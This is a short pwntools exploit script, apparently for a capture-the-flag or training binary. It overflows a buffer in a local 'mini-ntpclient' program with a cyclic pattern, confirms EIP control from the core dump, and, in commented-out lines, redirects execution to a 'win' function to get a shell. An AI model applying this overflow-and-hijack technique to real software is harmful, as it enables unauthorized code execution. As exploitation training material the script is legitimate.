30 lines
752 B
Python
30 lines
752 B
Python
from pwn import *
|
|
context(arch = 'i386', os = 'linux')
|
|
|
|
# Generate a cyclic pattern so that we can auto-find the offset
|
|
payload = cyclic(400)
|
|
|
|
# Run the process once so that it crashes
|
|
process(['./mini-ntpclient', payload]).wait()
|
|
|
|
# Get the core dump
|
|
core = Coredump('./core')
|
|
|
|
# Our cyclic pattern should have been used as the crashing address
|
|
print(type(pack(core.eip)))
|
|
print(type(payload))
|
|
assert pack(core.eip) in payload
|
|
|
|
|
|
# Cool! Now let's just replace that value with the address of 'win'
|
|
#crash = ELF('./mini-ntpclient')
|
|
#payload = fit({
|
|
# cyclic_find(core.rip): crash.symbols.win
|
|
#})
|
|
|
|
# Get a shell!
|
|
#io = process(['./mini-ntpclient' , payload])
|
|
#io.sendline(b'id')
|
|
#print(io.recvline())
|
|
# uid=1000(user) gid=1000(user) groups=1000(user)
|